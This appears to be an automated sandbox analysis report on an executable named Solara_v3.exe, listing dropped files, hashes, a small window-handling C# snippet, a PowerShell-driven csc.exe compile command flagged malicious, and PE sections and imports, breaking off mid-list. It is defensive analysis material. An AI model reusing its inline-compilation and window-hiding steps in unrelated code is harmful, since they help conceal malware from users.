                                                                                                                                                  SSDEEP:24:HoFzW91+fRuHDfHewKEsmNwI+ycuZhNuakSGPNnqS2d:U4dKhmm1ulua36qSG
                                                                                                                                                  MD5:ABDEBE123BA9150F2D2B11C7213FF094
                                                                                                                                                  SHA1:54BB74B674B39FF4FCD226B48C61D032CD18F374
                                                                                                                                                  SHA-256:4FCEDB1AD183D51554BB190DEB168AC07AA18E320C11C43C8E701415722ABDD2
                                                                                                                                                  SHA-512:85F1AB2E5C6C0892A662F9C333F4AC205F5CC8E82E8D326AEE766384E197DD24BE8E54FCCB1AA5E35D7AB3A2165E9077585DEAE4998750F335D195254CB29D46
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview:L...0Z}g.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........T....c:\Users\user\AppData\Local\Temp\py0wfw3n\CSCB237945D4EF64F37AEB0937E3F152BA1.TMP...............e.<...Q...a..6#w..........4.......C:\Users\user\AppData\Local\Temp\RES2A60.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.y.0.w.f.w.3.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gl1nut1e.ujn.psm1

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):60
                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t10askbo.sgr.ps1

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):60
                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\py0wfw3n\CSCB237945D4EF64F37AEB0937E3F152BA1.TMP

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                  File Type:MSVC .res
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):652
                                                                                                                                                  Entropy (8bit):3.098935720238665
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryQak7YnqqGPN5Dlq5J:+RI+ycuZhNuakSGPNnqX
                                                                                                                                                  MD5:651C3CC402B151BA80C161BAC6362377
                                                                                                                                                  SHA1:3B081F09D75FA7FAA115D88B8C3250E86BA1521D
                                                                                                                                                  SHA-256:F4178ABA35B6F4D299C57612410E1A5150589A3C9EE69DD308991A40DFD0E0DF
                                                                                                                                                  SHA-512:4184F0C26843A06492C703F6429292E086173B0B4245091A2474640B1BECED9942CA405F0BE85335BF1DC33C9251A5EE09134CC0DC9BE0F98E484E2EB1068CED
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.y.0.w.f.w.3.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...p.y.0.w.f.w.3.n...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.0.cs

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):353
                                                                                                                                                  Entropy (8bit):4.82408068685792
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:gCsHS6yqVPuM/sq2SRaqK4LovyFwM/sezhkKwGButFi2SRkoSoOD9:gC4JTDfei7krW0FU9O9
                                                                                                                                                  MD5:379570600F5439DDA873EDA8F0CE4A79
                                                                                                                                                  SHA1:2023B772101AFF5B12AB53F24A69742A4B9C394F
                                                                                                                                                  SHA-256:2C058658252D0F5A4613DC846D56329797E86033E3C61B9B68537AE167000072
                                                                                                                                                  SHA-512:70AD464F11597E9677A757C59A79A27650487D0F59CBB35D88E9775236E2DBF3CB78413B10EAC3E9A33E2CBA7FB1FB85EF7755B1D25E1C7D9513615EA4DAF152
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:. using System;.. using System.Runtime.InteropServices;.... public class Win32 {.. [DllImport("user32.dll")].. public static extern IntPtr GetForegroundWindow();.... [DllImport("user32.dll")].. [return: MarshalAs(UnmanagedType.Bool)].. public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);.. }

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.cmdline

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):369
                                                                                                                                                  Entropy (8bit):5.232412831427062
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fHAzxs7+AEszIwkn23fH9:p37Lvkmb6KRfvAWZEifv9
                                                                                                                                                  MD5:64F479D8D45769FDFCEC5FC1058E5942
                                                                                                                                                  SHA1:6283DB5ED22EA45BD847F377287F253D0A86EA38
                                                                                                                                                  SHA-256:EF7BBB19CE9A69C11E8B51A26F02DF802357876991EEC2CDA54D906F412E04E9
                                                                                                                                                  SHA-512:C018B802C897D4F2CB20BCDD6564B44F621A995E3205B4319B2341E4EEBCDF44EE166768064ED72A1E8FAA168993A825FD3676957A8F0E3F4602072FA9DC2BA1
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.0.cs"

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.dll

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3072
                                                                                                                                                  Entropy (8bit):2.915722829653808
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:etGSVW5GIYq/dudQ8OvkxkjvtkZfbQ99tEc8NoVWI+ycuZhNuakSGPNnq:6V9InudjdijOJq9t/Yl1ulua36q
                                                                                                                                                  MD5:6DE568C01223E0E59451296882F26EFB
                                                                                                                                                  SHA1:AE76B85030482D3C5E21A1E1CEB375BE763E6E3B
                                                                                                                                                  SHA-256:C0B387FA4F73A3B46272CFA18E801A512D5F7FA8CE3FA1C43082D2ABCB73E7C5
                                                                                                                                                  SHA-512:CD2E66D3007829587DA905A9D99A760C47EC06371DFBEB52F4FBC32265DD896D5221BE1A923FFC1EB854D4692C0F31DFC165F23F964F08774C497A57D236DA28
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0Z}g...........!.................#... ...@....... ....................................@..................................#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..@.............................................................(....*BSJB............v4.0.30319......l...<...#~......,...#Strings............#US.........#GUID.......T...#Blob...........G5........%3................................................................-.&...x.Y.....Y.................Y.................................... 4............ H.....P ......S...... ..................S...!.S. .).S...1.S.%...S.......*.....3.....!.....4.......H.........................

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.out

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (448), with CRLF, CR line terminators
                                                                                                                                                  Category:modified
                                                                                                                                                  Size (bytes):869
                                                                                                                                                  Entropy (8bit):5.317670646568992
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:KJBId3ka6KRfJEifQKax5DqBVKVrdFAMBJTH:Ckka6CJEuQK2DcVKdBJj
                                                                                                                                                  MD5:E974653618A63F05A8DF46610E174134
                                                                                                                                                  SHA1:AF8357706EE3F954485DD6F14C95177ECD6CA0DC
                                                                                                                                                  SHA-256:E55647C65E971BEBFF92D28FBA6781DF7413755A358F669CCE4C58FC91ACD1BD
                                                                                                                                                  SHA-512:AD572C79A70A43D9C2F60FA52C0194A62493065E305D608E0A9CD372A2B9D227D3E9C96A44B8FDB983337E575B20A1A0D707A215C8EB68F6589AD6C1AD8C0BB7
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                                                                  \Device\Null

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:ASCII text, with very long lines (951), with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):962
                                                                                                                                                  Entropy (8bit):5.425404696609983
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:0k4+tgsZS2kX+TxXGBCDwQ0qSS0i4nHadvoX1Oa2Eb:0Ct62M+4Bi0qz0iQHaVoFl2Eb
                                                                                                                                                  MD5:EFB1C46B1B6A31E778F16D10CD394451
                                                                                                                                                  SHA1:08B70EFD646F7AF8A3D4564B4D29CDB8ED1805A5
                                                                                                                                                  SHA-256:275C4DDA9B63257793262721F694A39D8B902C6EA1235004D52DC6F2E2B55438
                                                                                                                                                  SHA-512:1D7320A03F85B3223EBF9796E5E4C6E8528DBA59595F9B5616C3A529F9910D2E2FC653AE795238F11C1D5208820BE049B5819F65B9F8DD3CD6ADD4B32661C727
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:#< CLIXML..<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"><Obj S="progress" RefId="0"><TN RefId="0"><T>System.Management.Automation.PSCustomObject</T><T>System.Object</T></TN><MS><I64 N="SourceId">1</I64><PR N="Record"><AV>Preparing modules for first use.</AV><AI>0</AI><Nil /><PI>-1</PI><PC>-1</PC><T>Completed</T><SR>-1</SR><SD> </SD></PR></MS></Obj><S S="Error">Method invocation failed because [Win32] does not contain a method named 'GetWindowText'._x000D__x000A_</S><S S="Error">At line:19 char:5_x000D__x000A_</S><S S="Error">+ [Win32]::GetWindowText($hWnd, $sb, $sb.Capacity) | Out-Null_x000D__x000A_</S><S S="Error">+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~_x000D__x000A_</S><S S="Error"> + CategoryInfo : InvalidOperation: (:) [], RuntimeException_x000D__x000A_</S><S S="Error"> + FullyQualifiedErrorId : MethodNotFound_x000D__x000A_</S><S S="Error"> _x000D__x000A_</S></Objs>

                                                                                                                                                  Static File Info

                                                                                                                                                  General

                                                                                                                                                  File type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                  Entropy (8bit):6.797140324313722
                                                                                                                                                  TrID:
                                                                                                                                                  • Win64 Executable Console (202006/5) 87.25%
                                                                                                                                                  • Visual Basic Script (13500/0) 5.83%
                                                                                                                                                  • Win64 Executable (generic) (12005/4) 5.19%
                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.87%
                                                                                                                                                  • DOS Executable Generic (2002/1) 0.86%
                                                                                                                                                  File name:Solara_v3.exe
                                                                                                                                                  File size:33'921'780 bytes
                                                                                                                                                  MD5:404f9a9a90f2729d0acba7e76527fb88
                                                                                                                                                  SHA1:441a37963638e3f4635ef8c5fa35fd8fa566e325
                                                                                                                                                  SHA256:96559ba94a96b7a3ab66125a3556c6a8ec07fe561f8d60bd06f66520e3366c5e
                                                                                                                                                  SHA512:e226e8434b4252656f1eb4d3441e1f26b5f2de2532965816749d8cb24702dcf5eaef45c7bdccad7dadf8e6f1d4b7cf70168c399db13aed4f7e162f5b98a73ccc
                                                                                                                                                  SSDEEP:196608:dwbXq+vjOYt6zbQiA+XjQkDek5Ud5DDHINwd3cxGUe1CQOxg2FfNtmojn5M/qZVR:dwbXtp6zbbA+X8f8U4P22FXmDqZD
                                                                                                                                                  TLSH:8F777C03BA8718A9D09DC474834746A38A613CDB1B3AB9FF55C536252F7EAF05B3A314
                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y5.h.T.;.T.;.T.;.?.:;T.;.?.:.T.;.?.:.T.;...;.T.;.%.:,T.;.%.:.T.;.%.:.T.;.?.:.T.;.T.;.T.;.&.:.T.;.T.;.V.;.&.:.T.;.&&;.T.;.&.:.T.

                                                                                                                                                  File Icon

                                                                                                                                                  Icon Hash:f0e1f4f0d0e972c7

                                                                                                                                                  Static PE Info

                                                                                                                                                  General

                                                                                                                                                  Entrypoint:0x141515470
                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                  Digitally signed:false
                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                  Subsystem:windows cui
                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                  Time Stamp:0x5FE21E27 [Tue Dec 22 16:26:15 2020 UTC]
                                                                                                                                                  TLS Callbacks:0x4084df90, 0x1
                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                  OS Version Major:6
                                                                                                                                                  OS Version Minor:0
                                                                                                                                                  File Version Major:6
                                                                                                                                                  File Version Minor:0
                                                                                                                                                  Subsystem Version Major:6
                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                  Import Hash:c650cbf7c8459f7bd0ae3aba556dd87e

                                                                                                                                                  Entrypoint Preview

                                                                                                                                                  Instruction
                                                                                                                                                  dec eax
                                                                                                                                                  sub esp, 28h
                                                                                                                                                  call 00007FC330B2AF68h
                                                                                                                                                  dec eax
                                                                                                                                                  add esp, 28h
                                                                                                                                                  jmp 00007FC330B2A7C7h
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  dec eax
                                                                                                                                                  sub esp, 28h
                                                                                                                                                  dec ebp
                                                                                                                                                  mov eax, dword ptr [ecx+38h]
                                                                                                                                                  dec eax
                                                                                                                                                  mov ecx, edx
                                                                                                                                                  dec ecx
                                                                                                                                                  mov edx, ecx
                                                                                                                                                  call 00007FC330B2A962h
                                                                                                                                                  mov eax, 00000001h
                                                                                                                                                  dec eax
                                                                                                                                                  add esp, 28h
                                                                                                                                                  ret
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  inc eax
                                                                                                                                                  push ebx
                                                                                                                                                  inc ebp
                                                                                                                                                  mov ebx, dword ptr [eax]
                                                                                                                                                  dec eax
                                                                                                                                                  mov ebx, edx
                                                                                                                                                  inc ecx
                                                                                                                                                  and ebx, FFFFFFF8h
                                                                                                                                                  dec esp
                                                                                                                                                  mov ecx, ecx
                                                                                                                                                  inc ecx
                                                                                                                                                  test byte ptr [eax], 00000004h
                                                                                                                                                  dec esp
                                                                                                                                                  mov edx, ecx
                                                                                                                                                  je 00007FC330B2A965h
                                                                                                                                                  inc ecx
                                                                                                                                                  mov eax, dword ptr [eax+08h]
                                                                                                                                                  dec ebp
                                                                                                                                                  arpl word ptr [eax+04h], dx
                                                                                                                                                  neg eax
                                                                                                                                                  dec esp
                                                                                                                                                  add edx, ecx
                                                                                                                                                  dec eax
                                                                                                                                                  arpl ax, cx
                                                                                                                                                  dec esp
                                                                                                                                                  and edx, ecx
                                                                                                                                                  dec ecx
                                                                                                                                                  arpl bx, ax
                                                                                                                                                  dec edx
                                                                                                                                                  mov edx, dword ptr [eax+edx]
                                                                                                                                                  dec eax
                                                                                                                                                  mov eax, dword ptr [ebx+10h]
                                                                                                                                                  mov ecx, dword ptr [eax+08h]
                                                                                                                                                  dec eax
                                                                                                                                                  mov eax, dword ptr [ebx+08h]
                                                                                                                                                  test byte ptr [ecx+eax+03h], 0000000Fh
                                                                                                                                                  je 00007FC330B2A95Dh
                                                                                                                                                  movzx eax, byte ptr [ecx+eax+03h]
                                                                                                                                                  and eax, FFFFFFF0h
                                                                                                                                                  dec esp
                                                                                                                                                  add ecx, eax
                                                                                                                                                  dec esp
                                                                                                                                                  xor ecx, edx
                                                                                                                                                  dec ecx
                                                                                                                                                  mov ecx, ecx
                                                                                                                                                  pop ebx
                                                                                                                                                  jmp 00007FC330B2A966h
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  nop word ptr [eax+eax+00000000h]
                                                                                                                                                  dec eax
                                                                                                                                                  cmp ecx, dword ptr [00A39C31h]
                                                                                                                                                  jne 00007FC330B2A965h
                                                                                                                                                  dec eax
                                                                                                                                                  rol ecx, 10h
                                                                                                                                                  test cx, FFFFh
                                                                                                                                                  jne 00007FC330B2A955h
                                                                                                                                                  ret
                                                                                                                                                  dec eax
                                                                                                                                                  ror ecx, 10h
                                                                                                                                                  jmp 00007FC330B2B27Ch
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  inc eax
                                                                                                                                                  push ebx
                                                                                                                                                  dec eax

                                                                                                                                                  Data Directories

                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x1f3c1500x68.rdata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x1f3c1b80xa0.rdata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x20400000x1344.rsrc
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1f6e0000xd0ba8.pdata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x20420000x1d200.reloc
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x1d5dfc80x54.rdata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x1d5e1800x28.rdata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1d5e0200x138.rdata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x15450000x758.rdata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                  Sections

                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                  .text0x10000x1543da00x1543e00561ec8cdb94bb288e7f0eedac0f2e72eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                  .rdata0x15450000x9f8aa40x9f8c00ba7d6f1ae288dc90398ffb2b6b537debunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  .data0x1f3e0000x2fa500x11e00a8e709bffb0721c66ce8eb25a2bf4343False0.1423322770979021data2.7861489985627568IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                  .pdata0x1f6e0000xd0ba80xd0c005a8e05bb68b8e430fbc10cb058074aabFalse0.4521484375data6.886282734270313IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  _RDATA0x203f0000x940x2006e8350ec68cdfae634cb4cde29b6c60bFalse0.212890625data1.7840059761324978IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  .rsrc0x20400000x13440x1b400243cc2b926463e2fbec8a34fc7ea356aFalse0.03148294151376147data3.1282785025523854IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  .reloc0x20420000x1d2000x1d2004b12143aec5621b637328376ad463948False0.20516195010729613data5.478933361641409IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                  Resources

                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                  RT_ICON0x20401000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States0.6564258911819888
                                                                                                                                                  RT_GROUP_ICON0x20400e80x14dataEnglishUnited States1.1
                                                                                                                                                  RT_VERSION0x20411a80x19cdataEnglishUnited States0.5995145631067961

                                                                                                                                                  Imports

                                                                                                                                                  DLLImport
                                                                                                                                                  WS2_32.dlllisten, WSAGetLastError, closesocket, WSASendTo, WSARecvFrom, WSAGetOverlappedResult, setsockopt, WSASend, getsockopt, WSAIoctl, WSASocketW, WSARecv, getaddrinfo, getpeername, shutdown, recv, ioctlsocket, getsockname, WSACleanup, WSAStartup, freeaddrinfo, bind
                                                                                                                                                  KERNEL32.dllGetOEMCP, GetACP, IsValidCodePage, MultiByteToWideChar, GetStringTypeW, HeapSize, GetFileSizeEx, GetConsoleOutputCP, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, LCMapStringW, CompareStringW, GetTimeFormatW, GetDateFormatW, GetCommandLineA, SwitchToThread, SetConsoleMode, LeaveCriticalSection, CloseHandle, SetConsoleCursorPosition, lstrlenW, WaitForSingleObject, GetLastError, GetExitCodeProcess, GetCurrentProcessId, GetCommandLineW, GetProcessHeap, HeapFree, AddVectoredExceptionHandler, HeapAlloc, HeapReAlloc, GetStdHandle, GetFileInformationByHandleEx, GetConsoleMode, EnterCriticalSection, Sleep, CreateHardLinkW, DeviceIoControl, ReadFile, TerminateProcess, FreeLibrary, RegisterWaitForSingleObject, SetErrorMode, SetThreadErrorMode, LoadLibraryW, GetProcAddress, SetEnvironmentVariableW, GetConsoleScreenBufferInfo, GetProcessId, GetEnvironmentStringsW, FreeEnvironmentStringsW, OpenProcess, SetCurrentDirectoryW, CreateToolhelp32Snapshot, Process32First, Process32Next, SetFileTime, PostQueuedCompletionStatus, GetQueuedCompletionStatusEx, SetFileCompletionNotificationModes, CancelIoEx, WriteFile, GetOverlappedResult, CreateIoCompletionPort, SetHandleInformation, WaitForSingleObjectEx, CreateFileW, CreateSemaphoreW, ReadDirectoryChangesW, ReleaseSemaphore, CancelIo, GetSystemInfo, SetFileInformationByHandle, GetConsoleCursorInfo, SetConsoleCursorInfo, ReadConsoleInputW, FillConsoleOutputCharacterA, FillConsoleOutputAttribute, GetFileInformationByHandle, TlsGetValue, TlsSetValue, DeleteCriticalSection, GetModuleHandleW, SetLastError, GetEnvironmentVariableW, WriteConsoleW, InitializeCriticalSection, GetCurrentProcess, GetCurrentThread, RtlCaptureContext, GetCurrentDirectoryW, LoadLibraryA, CreateMutexA, RtlLookupFunctionEntry, TlsAlloc, FormatMessageW, GetTempPathW, GetModuleFileNameW, FlushFileBuffers, DuplicateHandle, SetFilePointerEx, FindNextFileW, CreateDirectoryW, ReadConsoleW, TryEnterCriticalSection, FindFirstFileW, CreateProcessW, CreateNamedPipeW, CreateEventW, WaitForMultipleObjects, ExitProcess, QueryPerformanceCounter, QueryPerformanceFrequency, GetSystemTimeAsFileTime, FindClose, DeleteFileW, MoveFileExW, RemoveDirectoryW, RtlUnwind, CopyFileExW, CreateThread, GetFinalPathNameByHandleW, UnregisterWaitEx, SetConsoleTextAttribute, GetSystemTimes, GlobalMemoryStatusEx, GetVersionExA, RtlVirtualUnwind, GetTimeZoneInformation, WideCharToMultiByte, GetThreadTimes, GetCurrentThreadId, DeleteFileA, GetTempPathA, GetTempFileNameA, GetFileType, OutputDebugStringA, VerSetConditionMask, VerifyVersionInfoW, VirtualAlloc, VirtualFree, IsDebuggerPresent, TlsFree, QueryThreadCycleTime, GetThreadPriority, SetThreadPriority, AcquireSRWLockExclusive, ReleaseSRWLockExclusive, TryAcquireSRWLockExclusive, AcquireSRWLockShared, ReleaseSRWLockShared, VirtualProtect, RtlAddFunctionTable, RtlDeleteFunctionTable, LoadLibraryExW, WakeConditionVariable, WakeAllConditionVariable, SleepConditionVariableSRW, InitOnceExecuteOnce, SetUnhandledExceptionFilter, RtlCaptureStackBackTrace, GetNativeSystemInfo, InitializeConditionVariable, OpenThread, SuspendThread, GetThreadContext, ResumeThread, CreateSemaphoreA, GetCPInfo, FindFirstFileExW, SetStdHandle, SetEndOfFile, ReleaseMutex, SetFileAttributesW, FreeLibraryAndExitThread, ExitThread, GetModuleHandleExW, EncodePointer, RtlUnwindEx, RaiseException, RtlPcToFileHeader, IsProcessorFeaturePresent, GetStartupInfoW, UnhandledExceptionFilter, InitializeSListHead, ResetEvent, SetEvent, 